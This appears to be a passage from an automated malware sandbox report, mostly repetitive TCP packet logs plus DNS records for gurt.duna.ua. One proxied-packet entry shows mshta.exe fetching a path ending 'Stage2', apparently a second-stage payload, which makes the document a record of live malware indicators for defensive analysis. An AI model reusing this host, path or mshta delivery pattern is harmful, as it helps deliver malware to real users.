                                                                                                                                                                                          Oct 27, 2024 07:35:16.732490063 CET44349748185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:16.733134985 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:16.733158112 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:16.733309984 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:16.733735085 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:16.733767033 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.421786070 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.421960115 CET49749443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.422291994 CET49749443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.422301054 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.422652960 CET49749443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.422667027 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.640729904 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.642446041 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.695848942 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.695940971 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.696060896 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.696151018 CET49749443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.698266983 CET49749443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.802299023 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.802313089 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.802495956 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.802505016 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.804146051 CET49749443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.804166079 CET44349749185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.804647923 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.804683924 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:17.804749012 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.804986954 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:17.805006027 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220029116 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220052958 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220103025 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220129013 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220139980 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220225096 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220232010 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220240116 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.220379114 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.339929104 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.339970112 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.340014935 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.340039015 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.340049028 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.340099096 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.459716082 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.459738016 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.459940910 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.459940910 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.459950924 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.460062027 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.579787970 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.579812050 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.579907894 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.579919100 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.579925060 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.580101013 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.698945999 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699090958 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699403048 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699428082 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699480057 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699486971 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699528933 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699614048 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699626923 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699795008 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.699800014 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.819387913 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.819422007 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.819485903 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.819502115 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.819664001 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.822252035 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.939352036 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.939373016 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.939682961 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.939699888 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.939708948 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.940411091 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.940434933 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.940522909 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.940522909 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.940532923 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.942307949 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.972723961 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.972793102 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.972966909 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.973407984 CET49752443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.973418951 CET44349752185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.973848104 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.973862886 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:18.974283934 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.974304914 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:18.974309921 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060017109 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060092926 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060319901 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060319901 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060574055 CET49750443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060589075 CET44349750185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060885906 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.060902119 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.061114073 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.061314106 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.061325073 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.861608982 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.861738920 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.862126112 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.862134933 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.862328053 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.862333059 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.952398062 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.952488899 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.953543901 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.953550100 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:19.953722954 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:19.953731060 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273078918 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273117065 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273139954 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273148060 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273159027 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273323059 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273323059 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273329973 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.273489952 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279602051 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279675961 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279748917 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279748917 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279772043 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279772043 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279781103 CET44349754185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.279829025 CET49754443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.280411959 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.280447960 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.280599117 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.280829906 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.280842066 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364269972 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364293098 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364319086 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364412069 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364412069 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364433050 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.364497900 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.365588903 CET49756443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.365603924 CET44349756185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.366504908 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.366533995 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:20.366703987 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.367146015 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:20.367163897 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.193325043 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.193453074 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.193949938 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.193990946 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.194123030 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.194130898 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.266503096 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.266695976 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.268197060 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.268279076 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.268496990 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.268536091 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552509069 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552536011 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552572966 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552588940 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552601099 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552644014 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552656889 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.552656889 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.553339005 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.553339005 CET49759443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.553345919 CET44349759185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.553930998 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.553956985 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.554121017 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.554275036 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.554291964 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.608557940 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.608635902 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.608679056 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.608782053 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.608942986 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.608958006 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.609169006 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.742779970 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.742803097 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.742842913 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.742851019 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.742960930 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.742981911 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.856895924 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.856950045 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.857037067 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.857048988 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.857112885 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.857112885 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.994389057 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.994437933 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.994474888 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.994486094 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.994524956 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:21.994551897 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.115634918 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.115683079 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.115711927 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.115720987 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.115961075 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.115961075 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.116841078 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.116982937 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.116991043 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.116996050 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.117026091 CET44349758185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.117106915 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.117106915 CET49758443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.118185997 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.118252039 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.119364977 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.119877100 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.119898081 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.453428030 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.454262018 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.489691019 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.489701986 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.489933968 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.489947081 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.761646032 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.761670113 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.761743069 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.761769056 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.761789083 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.761811972 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.762517929 CET61715443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.762577057 CET44361715185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.763488054 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.763510942 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:22.763799906 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.763848066 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:22.763859034 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.022142887 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.022430897 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.022656918 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.022663116 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.022887945 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.022896051 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.296065092 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.296154022 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.296166897 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.296214104 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.296875000 CET61717443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.296895027 CET44361717185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.665940046 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.666089058 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.666790009 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.666801929 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.667109013 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.667126894 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.940289021 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.940347910 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.940484047 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.940504074 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.940526009 CET44361718185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:23.940583944 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.941140890 CET61718443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:23.941145897 CET44361718185.68.16.189192.168.2.4

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Oct 27, 2024 07:35:03.269577026 CET6114253192.168.2.41.1.1.1
                                                                                                                                                                                          Oct 27, 2024 07:35:03.371248960 CET53611421.1.1.1192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:21.148539066 CET53612581.1.1.1192.168.2.4

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Oct 27, 2024 07:35:03.269577026 CET192.168.2.41.1.1.10x436cStandard query (0)gurt.duna.uaA (IP address)IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Oct 27, 2024 07:35:03.371248960 CET1.1.1.1192.168.2.40x436cNo error (0)gurt.duna.ua185.68.16.189A (IP address)IN (0x0001)false

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • gurt.duna.ua
                                                                                                                                                                                          • https:

                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.449730185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:04 UTC360OUTGET /programy-nauczania/GIEAnnualConferenceStage2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
